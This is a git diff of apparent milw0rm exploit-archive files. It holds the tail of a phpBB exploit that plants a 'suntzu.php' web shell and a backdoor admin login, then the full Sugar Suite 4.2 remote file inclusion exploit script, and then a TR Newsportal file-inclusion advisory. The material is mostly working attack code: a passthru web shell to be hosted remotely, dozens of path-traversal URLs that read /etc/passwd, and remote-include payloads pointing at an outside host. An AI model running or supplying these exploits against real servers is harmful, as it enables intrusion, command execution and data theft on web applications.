+$packet="GET ".$p."faq.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+sleep(1);
+
+echo "step 7 -> Launch commands...\r\n";
+$packet="GET ".$p."suntzu.php HTTP/1.0\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Cookie: cmd=dir;\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"56789"))
+{
+ echo "Exploit succeeded...\r\n";
+ $temp=explode("56789",$html);
+ echo "\r\n".$temp[1]."\r\n";
+}
+else
+{
+ echo "Exploit failed...however you will be able to login as admin\r\n";
+ echo "with username \"suntzu\" and password \"suntzu\"\r\n";
+}
+
+
+echo "step 8 -> restore phpbb_config with the old value to keep the board accessible\r\n";
+$sql='
+#
+# old value for default_lang
+#
+
+UPDATE phpbb_config SET config_value="english" where config_name="default_lang";
+
+';
+
+$data='-----------------------------7d62702f250530
+Content-Disposition: form-data; name="backup_file"; filename="suntzu.sql";
+Content-Type: text/plain
+
+'.$sql.'
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="perform"
+
+restore
+-----------------------------7d62702f250530
+Content-Disposition: form-data; name="restore_start"
+
+Start Restore
+-----------------------------7d62702f250530--
+';
+$packet="POST ".$p."admin/admin_db_utilities.php?sid=".$session_id." 
HTTP/1.0\r\n";
+$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
+$packet.="Referer: http://".$host.$path."profile.php?mode=editprofile\r\n";
+$packet.="Accept-Language: it\r\n";
+$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d62702f250530\r\n";
+$packet.="Accept-Encoding: gzip, deflate\r\n";
+$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
+$packet.="Host: ".$host."\r\n";
+$packet.="Content-Length: ".strlen($data)."\r\n";
+$packet.="Connection: Close\r\n";
+$packet.="Cache-Control: no-cache\r\n";
+$packet.="Cookie: ".$cookie."\r\n\r\n";
+$packet.=$data;
+sendpacketii($packet);
+if (eregi("The Database has been successfully restored",$html))
+{
+echo "Done...\r\n";
+}
+else
+{
+die("Unable to modify table...");
+}
+?>
+
+# milw0rm.com [2006-05-13]
diff --git a/platforms/php/webapps/1785.php b/platforms/php/webapps/1785.php
index 7e23bf377..098348ca1 100755
--- a/platforms/php/webapps/1785.php
+++ b/platforms/php/webapps/1785.php
@@ -1,226 +1,226 @@
-#!/usr/bin/php -q -d short_open_tag=on
-<?
-echo "Sugar Suite Open Source <= 4.2 \"OptimisticLock!\" arbitrary remote inclusion exploit\r\n";
-echo "by rgod rgod@autistici.org\r\n";
-echo "site: http://retrogod.altervista.org\r\n\r\n";
-echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n";
-
-if ($argc<5) {
-echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
-echo "host: target server (ip/hostname)\r\n";
-echo "path: path to sugar suite\r\n";
-echo "location: an arbitrary location with the code to include\r\n";
-echo "cmd: a shell command\r\n";
-echo "Options:\r\n";
-echo " -p[port]: specify a port other than 80\r\n";
-echo " -P[ip:port]: specify a proxy\r\n";
-echo "Examples:\r\n";
-echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la\r\n";
-echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la -p81\r\n";
-echo "php ".$argv[0]." localhost / http://somehost.com/shell.txt ls -la -P1.1.1.1:80\r\n\r\n";
-echo "note, you need this code in http://somehost.com/shell.txt\r\n";
-echo "<?php\r\n";
-echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
-echo "ini_set(\"max_execution_time\",0);\r\n";
-echo "echo \"*delim*\";\r\n";
-echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
-echo "echo \"*delim*\";\r\n";
-echo "?>\r\n";
-die;
-}
-
-/* software site: http://www.sugarcrm.com/crm/
-
- i) vulnerable code in modules/OptimisticLock/LockResolve.php:
-
- ...
- if(empty($GLOBALS['sugarEntry'])) die('Not A Valid Entry Point'); //<--- the f@ke protection, nearly in all files
- ...
- if(isset($_SESSION['o_lock_object'])){
- global $beanFiles, $moduleList;
- $object = $_SESSION['o_lock_object'];
- require_once($beanFiles[$beanList[$_SESSION['o_lock_module']]]);
- $current_state = new $_SESSION['o_lock_class']();
- $current_state->retrieve($object['id']);
-
- if(isset($_REQUEST['save'])){
- $_SESSION['o_lock_fs'] = true;
- echo $_SESSION['o_lock_save'];
- die();
- }else{
- display_conflict_between_objects($object, $current_state->toArray(),$current_state->field_defs, $current_state->module_dir, $_SESSION['o_lock_class']);
-}}else{
- echo 'No Locked Objects';
-}
-...
-
-you can include files from local & remote resources and launch commands, poc:
-
-with register_globals = On & allow_url_fopen = On:
-http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://somehost.com/someshell.txt
-with register_globals = On:
-http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=../../../../../../../../etc/passwd
-
-ii) arbitrary local inclusion issues in a lot of files:
-
-with register_globals = On & magic_quotes_gpc = Off:
-http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Contacts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Dashboard/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Documents/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Dropdown/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Dropdown/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/DynamicFields/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EditCustomFields/EditView.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EditCustomFields/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EmailMan/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Emails/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/EmailTemplates/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Feeds/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Home/PopupSugar.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Leads/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/MailMerge/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Meetings/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Notes/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Opportunities/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Project/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Project/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/ProjectTask/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/ProspectLists/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Prospects/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Roles/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Tasks/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Users/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-http://[target]/[path]/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
-
-with register_globals=On:
-http://[target]/[path]/modules/Administration/RebuildAudit.php?GLOBALS[sugarEntry]=1&beanFiles[1]=../../../../../../../../../../../../../etc/passwd
-
-and (on PHP5) arbitrary remote inclusion, including a file from a ftp resource:
-
-http://[target]/[path]/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://username:password@somehost.com/shell.txt
-
-this is the exploit tool for i)
- */
-error_reporting(0);
-ini_set("max_execution_time",0);
-ini_set("default_socket_timeout",5);
-
-function quick_dump($string)
-{
- $result='';$exa='';$cont=0;
- for ($i=0; $i<=strlen($string)-1; $i++)
- {
- if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
- {$result.=" .";}
- else
- {$result.=" ".$string[$i];}
- if (strlen(dechex(ord($string[$i])))==2)
- {$exa.=" ".dechex(ord($string[$i]));}
- else
- {$exa.=" 0".dechex(ord($string[$i]));}
- $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
- }
- return $exa."\r\n".$result;
-}
-$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
-function 
sendpacketii($packet)
-{
- global $proxy, $host, $port, $html, $proxy_regex;
- if ($proxy=='') {
- $ock=fsockopen(gethostbyname($host),$port);
- if (!$ock) {
- echo 'No response from '.$host.':'.$port; die;
- }
- }
- else {
- $c = preg_match($proxy_regex,$proxy);
- if (!$c) {
- echo 'Not a valid proxy...';die;
- }
- $parts=explode(':',$proxy);
- echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
- $ock=fsockopen($parts[0],$parts[1]);
- if (!$ock) {
- echo 'No response from proxy...';die;
- }
- }
- fputs($ock,$packet);
- if ($proxy=='') {
- $html='';
- while (!feof($ock)) {
- $html.=fgets($ock);
- }
- }
- else {
- $html='';
- while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
- $html.=fread($ock,1);
- }
- }
- fclose($ock);
- #debug
- #echo "\r\n".$html;
-
-}
-$host=$argv[1];
-$path=$argv[2];
-$loc=urlencode($argv[3]);
-if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
-{die("Check the path, it must begin and end with a trailing slash\r\n");}
-$port=80;
-$proxy="";
-$cmd="";
-for ($i=4; $i<=$argc-1; $i++){
-$temp=$argv[$i][0].$argv[$i][1];
-if (($temp<>"-p") and ($temp<>"-P"))
-{
-$cmd.=" ".$argv[$i];
-}
-if ($temp=="-p")
-{
- $port=str_replace("-p","",$argv[$i]);
-}
-if ($temp=="-P")
-{
- $proxy=str_replace("-P","",$argv[$i]);
-}
-}
-$cmd=urlencode($cmd);
-if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
-
-$packet ="GET ".$p."modules/OptimisticLock/LockResolve.php HTTP/1.0\r\n";
-$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n";
-$packet.="Host: ".$host."\r\n";
-//through cookies, it's the same, maybe can bypass some ids...
-$packet.="Cookie: GLOBALS[sugarEntry]=1; _SESSION[o_lock_object]=1; _SESSION[o_lock_module]=1; beanList[1]=1; beanFiles[1]=".$loc."; cmd=".$cmd.";\r\n";
-$packet.="Connection: Close\r\n\r\n";
-sendpacketii($packet);
-if (strstr($html,"*delim*"))
-{
- echo "Exploit succeeded...";
- $temp=explode("*delim*",$html);
- die("\r\n".$temp[1]."\r\n");
-}
-else
-{
- if (strstr($html,"Not A Valid Entry Point")) {echo "register_globals off here...\r\n";}
- echo "Exploit failed...";
-}
-?>
-
-# milw0rm.com [2006-05-14]
+#!/usr/bin/php -q -d short_open_tag=on
+<?
+echo "Sugar Suite Open Source <= 4.2 \"OptimisticLock!\" arbitrary remote inclusion exploit\r\n";
+echo "by rgod rgod@autistici.org\r\n";
+echo "site: http://retrogod.altervista.org\r\n\r\n";
+echo "this is called the \"five claws of Sun-tzu\"\r\n\r\n";
+
+if ($argc<5) {
+echo "Usage: php ".$argv[0]." host path location cmd OPTIONS\r\n";
+echo "host: target server (ip/hostname)\r\n";
+echo "path: path to sugar suite\r\n";
+echo "location: an arbitrary location with the code to include\r\n";
+echo "cmd: a shell command\r\n";
+echo "Options:\r\n";
+echo " -p[port]: specify a port other than 80\r\n";
+echo " -P[ip:port]: specify a proxy\r\n";
+echo "Examples:\r\n";
+echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la\r\n";
+echo "php ".$argv[0]." localhost /sugar/ http://somehost.com/shell.txt ls -la -p81\r\n";
+echo "php ".$argv[0]." localhost / http://somehost.com/shell.txt ls -la -P1.1.1.1:80\r\n\r\n";
+echo "note, you need this code in http://somehost.com/shell.txt\r\n";
+echo "<?php\r\n";
+echo "if (get_magic_quotes_gpc()){\$_REQUEST[\"cmd\"]=stripslashes(\$_REQUEST[\"cmd\"]);}\r\n";
+echo "ini_set(\"max_execution_time\",0);\r\n";
+echo "echo \"*delim*\";\r\n";
+echo "passthru(\$_REQUEST[\"cmd\"]);\r\n";
+echo "echo \"*delim*\";\r\n";
+echo "?>\r\n";
+die;
+}
+
+/* software site: http://www.sugarcrm.com/crm/
+
+ i) vulnerable code in modules/OptimisticLock/LockResolve.php:
+
+ ...
+ if(empty($GLOBALS['sugarEntry'])) die('Not A Valid Entry Point'); //<--- the f@ke protection, nearly in all files
+ ...
+ if(isset($_SESSION['o_lock_object'])){
+ global $beanFiles, $moduleList;
+ $object = $_SESSION['o_lock_object'];
+ require_once($beanFiles[$beanList[$_SESSION['o_lock_module']]]);
+ $current_state = new $_SESSION['o_lock_class']();
+ $current_state->retrieve($object['id']);
+
+ if(isset($_REQUEST['save'])){
+ $_SESSION['o_lock_fs'] = true;
+ echo $_SESSION['o_lock_save'];
+ die();
+ }else{
+ display_conflict_between_objects($object, $current_state->toArray(),$current_state->field_defs, $current_state->module_dir, $_SESSION['o_lock_class']);
+}}else{
+ echo 'No Locked Objects';
+}
+...
+
+you can include files from local & remote resources and launch commands, poc:
+
+with register_globals = On & allow_url_fopen = On:
+http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=http://somehost.com/someshell.txt
+with register_globals = On:
+http://[target]/[path]/modules/OptimisticLock/LockResolve.php?GLOBALS[sugarEntry]=1&_SESSION[o_lock_object]=1&_SESSION[o_lock_module]=1&beanList[1]=1&beanFiles[1]=../../../../../../../../etc/passwd
+
+ii) arbitrary local inclusion issues in a lot of files:
+
+with register_globals = On & magic_quotes_gpc = Off:
+http://[target]/[path]/modules/Administration/CustomizeFields.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/Development.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/DstFix.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/include/SubPanel/SubPanelViewer.php?GLOBALS[sugarEntry]=1&module=1&record=1&beanList[1]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Accounts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Administration/Upgrade.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Bugs/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Calendar/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Calls/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/CampaignLog/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Campaigns/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Campaigns/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/CampaignTrackers/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Cases/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Contacts/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Dashboard/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Documents/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Dropdown/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Dropdown/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/DynamicFields/Popup.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EditCustomFields/EditView.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EditCustomFields/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EmailMan/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Emails/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/EmailTemplates/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Feeds/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Home/PopupSugar.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Leads/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/MailMerge/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Meetings/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Notes/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Opportunities/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Project/Forms.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Project/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/ProjectTask/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/ProspectLists/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Prospects/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Roles/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Tasks/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Users/index.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+http://[target]/[path]/modules/Users/Login.php?GLOBALS[sugarEntry]=1&theme=../../../../../../../../../../../../etc/passwd%00
+
+with register_globals=On:
+http://[target]/[path]/modules/Administration/RebuildAudit.php?GLOBALS[sugarEntry]=1&beanFiles[1]=../../../../../../../../../../../../../etc/passwd
+
+and (on PHP5) arbitrary remote inclusion, including a file from a ftp resource:
+
+http://[target]/[path]/modules/Administration/RebuildAudit.php?cmd=ls%20-la&GLOBALS[sugarEntry]=1&beanFiles[1]=ftp://username:password@somehost.com/shell.txt
+
+this is the exploit tool for i)
+ */
+error_reporting(0);
+ini_set("max_execution_time",0);
+ini_set("default_socket_timeout",5);
+
+function quick_dump($string)
+{
+ $result='';$exa='';$cont=0;
+ for ($i=0; $i<=strlen($string)-1; $i++)
+ {
+ if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
+ {$result.=" .";}
+ else
+ {$result.=" ".$string[$i];}
+ if (strlen(dechex(ord($string[$i])))==2)
+ {$exa.=" ".dechex(ord($string[$i]));}
+ else
+ {$exa.=" 0".dechex(ord($string[$i]));}
+ $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; 
$exa.="\r\n";}
+ }
+ return $exa."\r\n".$result;
+}
+$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
+function sendpacketii($packet)
+{
+ global $proxy, $host, $port, $html, $proxy_regex;
+ if ($proxy=='') {
+ $ock=fsockopen(gethostbyname($host),$port);
+ if (!$ock) {
+ echo 'No response from '.$host.':'.$port; die;
+ }
+ }
+ else {
+ $c = preg_match($proxy_regex,$proxy);
+ if (!$c) {
+ echo 'Not a valid proxy...';die;
+ }
+ $parts=explode(':',$proxy);
+ echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
+ $ock=fsockopen($parts[0],$parts[1]);
+ if (!$ock) {
+ echo 'No response from proxy...';die;
+ }
+ }
+ fputs($ock,$packet);
+ if ($proxy=='') {
+ $html='';
+ while (!feof($ock)) {
+ $html.=fgets($ock);
+ }
+ }
+ else {
+ $html='';
+ while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
+ $html.=fread($ock,1);
+ }
+ }
+ fclose($ock);
+ #debug
+ #echo "\r\n".$html;
+
+}
+$host=$argv[1];
+$path=$argv[2];
+$loc=urlencode($argv[3]);
+if (($path[0]<>'/') | ($path[strlen($path)-1]<>'/'))
+{die("Check the path, it must begin and end with a trailing slash\r\n");}
+$port=80;
+$proxy="";
+$cmd="";
+for ($i=4; $i<=$argc-1; $i++){
+$temp=$argv[$i][0].$argv[$i][1];
+if (($temp<>"-p") and ($temp<>"-P"))
+{
+$cmd.=" ".$argv[$i];
+}
+if ($temp=="-p")
+{
+ $port=str_replace("-p","",$argv[$i]);
+}
+if ($temp=="-P")
+{
+ $proxy=str_replace("-P","",$argv[$i]);
+}
+}
+$cmd=urlencode($cmd);
+if ($proxy<>'') {$p="http://".$host.":".$port.$path;} else {$p=$path;}
+
+$packet ="GET ".$p."modules/OptimisticLock/LockResolve.php HTTP/1.0\r\n";
+$packet.="User-Agent: Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\r\n";
+$packet.="Host: ".$host."\r\n";
+//through cookies, it's the same, maybe can bypass some ids...
+$packet.="Cookie: GLOBALS[sugarEntry]=1; _SESSION[o_lock_object]=1; _SESSION[o_lock_module]=1; beanList[1]=1; beanFiles[1]=".$loc."; cmd=".$cmd.";\r\n";
+$packet.="Connection: Close\r\n\r\n";
+sendpacketii($packet);
+if (strstr($html,"*delim*"))
+{
+ echo "Exploit succeeded...";
+ $temp=explode("*delim*",$html);
+ die("\r\n".$temp[1]."\r\n");
+}
+else
+{
+ if (strstr($html,"Not A Valid Entry Point")) {echo "register_globals off here...\r\n";}
+ echo "Exploit failed...";
+}
+?>
+
+# milw0rm.com [2006-05-14]
diff --git a/platforms/php/webapps/1789.txt b/platforms/php/webapps/1789.txt
index 8e7cd48d5..6f77f265e 100755
--- a/platforms/php/webapps/1789.txt
+++ b/platforms/php/webapps/1789.txt
@@ -1,28 +1,28 @@ -################ DEVIL TEAM THE BEST POLISH TEAM ################# -#TR Newsportal - Remote File Include -#Find by Kacper (Rahim). -#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** -#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl -#dork: "TR Newsportal" brought by TRanx. -################################################################## -extras/poll/poll.php: -[code] -<? -include("$file_newsportal"); -$ns=OpenNNTPconnection($server,$port); -flush(); -if ($ns != false) { - $headers = readOverview($ns,$group,1,true); - closeNNTPconnection($ns); -} -?> -[/code] -~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ - -http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts] - - -################################################################### -#Elo ;-) - -# milw0rm.com [2006-05-15] +################ DEVIL TEAM THE BEST POLISH TEAM ################# +#TR Newsportal - Remote File Include +#Find by Kacper (Rahim). +#Greetings For ALL DEVIL TEAM members, Special DragonHeart :*** +#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl +#dork: "TR Newsportal" brought by TRanx. +################################################################## +extras/poll/poll.php: +[code] +<? +include("$file_newsportal"); +$ns=OpenNNTPconnection($server,$port); +flush(); +if ($ns != false) { + $headers = readOverview($ns,$group,1,true); + closeNNTPconnection($ns); +} +?> +[/code] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +http://www.site.com/[Newsportal_path]/extras/poll/poll.php?file_newsportal=[evil_scripts] + + +################################################################### +#Elo ;-) + +# milw0rm.com [2006-05-15] diff --git a/platforms/php/webapps/1790.txt b/platforms/php/webapps/1790.txt index c62112e65..723a4ecde 100755 --- a/platforms/php/webapps/1790.txt +++ b/platforms/php/webapps/1790.txt 
